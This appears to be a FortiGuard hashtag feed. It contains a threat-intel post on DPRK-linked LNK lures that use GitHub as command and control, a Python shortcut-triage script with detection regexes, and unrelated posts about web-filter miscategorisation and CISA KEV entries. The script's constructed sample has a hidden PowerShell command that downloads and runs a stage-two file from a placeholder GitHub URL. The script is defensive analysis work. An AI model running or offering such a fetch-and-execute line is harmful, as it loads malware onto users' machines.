DPRK-Related Campaigns with LNK and GitHub C2

FortiGuard Labs recently detected a series of LNK files targeting users in South Korea. These attacks use a multi-stage scripting process and leverage GitHub as Command and Control (C2) infrastructure to evade detection. Although these LNK files can be traced back to 2024, earlier versions had less obfuscation and contained significant metadata, allowing us to track similar attacks spreading the XenoRAT malware.

Pulse ID: 69cfceee4f7a6c4305b3d1a4
Pulse Link: https://otx.alienvault.com/pulse/69cfceee4f7a6c4305b3d1a4
Pulse Author: AlienVault
Created: 2026-04-03 14:30:06

Be advised, this data is unverified and should be considered preliminary. Always do further verification.

#CyberSecurity #DPRK #FortiGuard #FortiGuardLabs #GitHub #InfoSec #Korea #LNK #Malware #OTX #OpenThreatExchange #RAT #SouthKorea #bot #AlienVault

LevelBlue - Open Threat Exchange

Learn about the latest cyber threats. Research, collaborate, and share threat intelligence in real time. Protect yourself and the community against today's emerging threats.

LevelBlue Open Threat Exchange
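The pulse above describes shortcut (.lnk) lures that launch a multi-stage script and pull later stages from GitHub. The quickest triage step for such a sample is to read the shortcut's StringData (target path and command-line arguments) straight from the MS-SHLLINK structure rather than resolving it on a Windows host. The following is an added example written for this page, not code from FortiGuard Labs or from the OTX pulse: it builds a constructed .lnk in memory, parses it back, and applies scoring heuristics (script-host target, hidden-window or encoded-command switches, GitHub URLs in arguments, minimised ShowCommand) that are this example's own assumptions, not indicators published with the report. The GitHub URL in the sample is made up.

```python
"""Minimal MS-SHLLINK (.lnk) builder, parser and triage scorer.

Added example for this page; not FortiGuard Labs code. The sample shortcut is
constructed here, and the scoring heuristics are assumptions, not IOCs.
"""
import re
import struct

HEADER_SIZE = 0x4C
HEADER_FMT = "<I16sIIQQQIIIHHII"  # ShellLinkHeader, MS-SHLLINK 2.1 (76 bytes)
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")  # 00021401-0000-0000-C000-000000000046
# LinkFlags bits (MS-SHLLINK 2.1.1)
HAS_LINK_TARGET_ID_LIST = 1 << 0
HAS_LINK_INFO = 1 << 1
HAS_NAME = 1 << 2
HAS_RELATIVE_PATH = 1 << 3
HAS_WORKING_DIR = 1 << 4
HAS_ARGUMENTS = 1 << 5
HAS_ICON_LOCATION = 1 << 6
IS_UNICODE = 1 << 7
# StringData fields appear in this fixed order when their flag is set
STRING_FIELDS = [("name", HAS_NAME), ("relative_path", HAS_RELATIVE_PATH),
                 ("working_dir", HAS_WORKING_DIR), ("arguments", HAS_ARGUMENTS),
                 ("icon_location", HAS_ICON_LOCATION)]
SW_SHOWNORMAL, SW_SHOWMINNOACTIVE = 1, 7


def build_lnk(relative_path, arguments, show_command=SW_SHOWMINNOACTIVE):
    """Build a minimal Unicode .lnk carrying only RELATIVE_PATH and COMMAND_LINE_ARGUMENTS."""
    flags = HAS_RELATIVE_PATH | HAS_ARGUMENTS | IS_UNICODE
    header = struct.pack(HEADER_FMT, HEADER_SIZE, LNK_CLSID, flags, 0x80,  # FILE_ATTRIBUTE_NORMAL
                         0, 0, 0, 0, 0, show_command, 0, 0, 0, 0)
    body = b""
    for value in (relative_path, arguments):
        # CountCharacters (uint16) followed by the UTF-16LE string, no terminator
        body += struct.pack("<H", len(value)) + value.encode("utf-16le")
    return header + body


def parse_lnk(data):
    """Parse header and StringData; skip LinkTargetIDList/LinkInfo by their declared sizes."""
    if len(data) < HEADER_SIZE:
        raise ValueError("too short for a ShellLinkHeader")
    fields = struct.unpack_from(HEADER_FMT, data, 0)
    if fields[0] != HEADER_SIZE or fields[1] != LNK_CLSID:
        raise ValueError("not a Shell Link (bad HeaderSize or LinkCLSID)")
    flags, show_command = fields[2], fields[9]
    off = HEADER_SIZE
    if flags & HAS_LINK_TARGET_ID_LIST:
        (id_list_size,) = struct.unpack_from("<H", data, off)
        off += 2 + id_list_size
    if flags & HAS_LINK_INFO:
        (link_info_size,) = struct.unpack_from("<I", data, off)
        off += link_info_size
    unicode = bool(flags & IS_UNICODE)
    out = {"flags": flags, "show_command": show_command}
    for name, bit in STRING_FIELDS:
        if not flags & bit:
            continue
        (count,) = struct.unpack_from("<H", data, off)
        off += 2
        nbytes = count * 2 if unicode else count
        raw = data[off:off + nbytes]
        if len(raw) != nbytes:
            raise ValueError(f"truncated {name} string")
        out[name] = raw.decode("utf-16le" if unicode else "cp1252", errors="replace")
        off += nbytes
    return out


# Heuristics below are assumptions for illustration, not published indicators.
SCRIPT_HOSTS = re.compile(r"^(powershell|pwsh|cmd|mshta|wscript|cscript|rundll32|regsvr32)(\.exe)?$", re.I)
GITHUB_URL = re.compile(r"https?://(raw\.githubusercontent\.com|gist\.github\.com|api\.github\.com|github\.com)/", re.I)
HIDDEN_OR_ENCODED = re.compile(r"-(w|windowstyle)\s+hidden|-enc\w*\s|-e\s", re.I)


def triage(parsed):
    """Return (score, reasons); each matched heuristic adds one point."""
    reasons = []
    target = parsed.get("relative_path", "").replace("/", "\\").split("\\")[-1]
    args = parsed.get("arguments", "")
    if SCRIPT_HOSTS.search(target):
        reasons.append(f"target is a script host: {target}")
    if len(args) > 200:
        reasons.append(f"unusually long arguments ({len(args)} chars)")
    if HIDDEN_OR_ENCODED.search(args):
        reasons.append("hidden-window or encoded-command switch in arguments")
    if GITHUB_URL.search(args):
        reasons.append("arguments fetch content from GitHub")
    if parsed.get("show_command") == SW_SHOWMINNOACTIVE:
        reasons.append("ShowCommand=SW_SHOWMINNOACTIVE (window minimised)")
    return len(reasons), reasons


# Constructed sample; the repository URL is invented for this example.
LURE_TARGET = r"..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
LURE_ARGS = ('-w hidden -nop -c "iwr https://raw.githubusercontent.com/example-user/'
             'example-repo/main/stage2.txt -UseBasicParsing | iex"')

if __name__ == "__main__":
    for path, args, show in ((LURE_TARGET, LURE_ARGS, SW_SHOWMINNOACTIVE),
                             (r"..\Documents\report.pdf", "", SW_SHOWNORMAL)):
        score, why = triage(parse_lnk(build_lnk(path, args, show)))
        print(path.split("\\")[-1], score, why)
```

Real lures usually also carry a LinkTargetIDList and an ExtraData block after the strings; the parser skips the former by its declared size and simply stops after StringData, which is enough to recover the target and arguments that matter for triage.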

The categorization of the Fortinet web filter is hilarious. I got a report that a certain website is incorrectly blocked by our firewall. After looking into it, the specific website belongs to a large organization.

Different organizational levels of this large organization are categorized as:

  • Political organization (federal level)
  • General organization (state level)
  • Advocacy organization (local level), giving it an R age rating (18+)

The “correct” classification should be either general organization or simply “business”.

This is wrong on many levels. Why are advocacy groups blocked by default? Why do they have an R rating (because politics is only for adults? But then why only advocacy groups and not political organizations?).

#fortinet #fortigate #fortiguard

CISA Adds FortiGuard Vulnerability to KEV Catalog – 11-18-25 – Yet another FortiGuard 0-day exploited vulnerability – https://tinyurl.com/bw93739d #KEV #CISA #FortiGuard

Today CISA announced that they had added an OS command injection vulnerability in the FortiGuard FortiWeb products to their Known Exploited...

CISA Adds FortiOS Vulnerability to KEV Catalog – 6-25-25 – https://tinyurl.com/3mpfmhm5 #KEV #CISA #FortiGuard

Today CISA announced that it had added a use of hard-coded credentials vulnerability in the FortiGuard FortiOS product to their Known Explo...

CISA Adds FortiGuard Vulnerability to KEV Catalog – 5-14-25 – Stack-based buffer overflow in five FortiGuard product lines – https://tinyurl.com/ye5m9b7x #KEV #FortiGuard

Today CISA announced that it had added a stack-based buffer overflow vulnerability in multiple FortiGuard products to their Known Exploited...

#Facebook isn't blocked at school but the Illinois Coalition for Immigrant and Refugee Rights is. https://www.icirr.org/
Thanks #Fortiguard for that.
Category: Advocacy Organizations.
Why the fuck is that a category to block?
And it looks like it was selected by the school district as well.
Illinois Coalition for Immigrant and Refugee Rights

ICIRR is dedicated to promoting the rights of immigrants and refugees to full and equal participation in the civic, cultural, social, and political life of our diverse society.

ICIRR
PSIRT | FortiGuard Labs

FortiGuard Labs

I have updated my blog to a different yet suitable theme. Everything is good except for this one anomaly. When I open one menu from the blog, the browser redirects the tab to http (and causes a FortiGuard alert). Changing the http to https manually in the browser fixes the problem. What is the problem? My server is running nginx, and inside the config there is a directive to redirect http to https (normal configuration).

Note: when using FreeBSD (current laptop), the error/block never occurred.

#fortiguard #web #hugo

Volt Typhoon targets US critical infrastructure with living-off-the-land techniques | Microsoft Security Blog

Microsoft has uncovered stealthy malicious activity by Volt Typhoon focused on post-compromise credential access & network system discovery.

Microsoft Security Blog
Just Posted: The article reviews Fortinet's integration of AI and ML in cybersecurity, underscoring their extensive AI-powered Security Fabric platform and the company's balance of AI innovation with human insight to provide robust cybersecurity solutions. #AI #CyberSecurity #FortiGuard #GenAI #ML #Security #Sponsored
https://gestaltit.com/sponsored/fortinet/gestalt/leveraging-ai-within-cybersecurity-with-fortinet/
Leveraging AI Within Cybersecurity with Fortinet - Gestalt IT

Fortinet's long history of leveraging AI/ML within cybersecurity—and delivering some of the first AI-powered solutions and services to customers in the industry—positions Fortinet as a trailblazer in the cybersecurity landscape. The more than forty unique AI-powered offerings across its Security Fabric platform and the thoughtful way it augments AI/ML with human intelligence underscores Fortinet's commitment to providing adaptive and effective cybersecurity solutions. As threats, tools, and technologies evolve, Fortinet stands ready to address these challenges with innovative solutions—like its FortiGuard AI-Powered Security Services—that bridge the gap between AI innovation and the enduring importance of human expertise.

Gestalt IT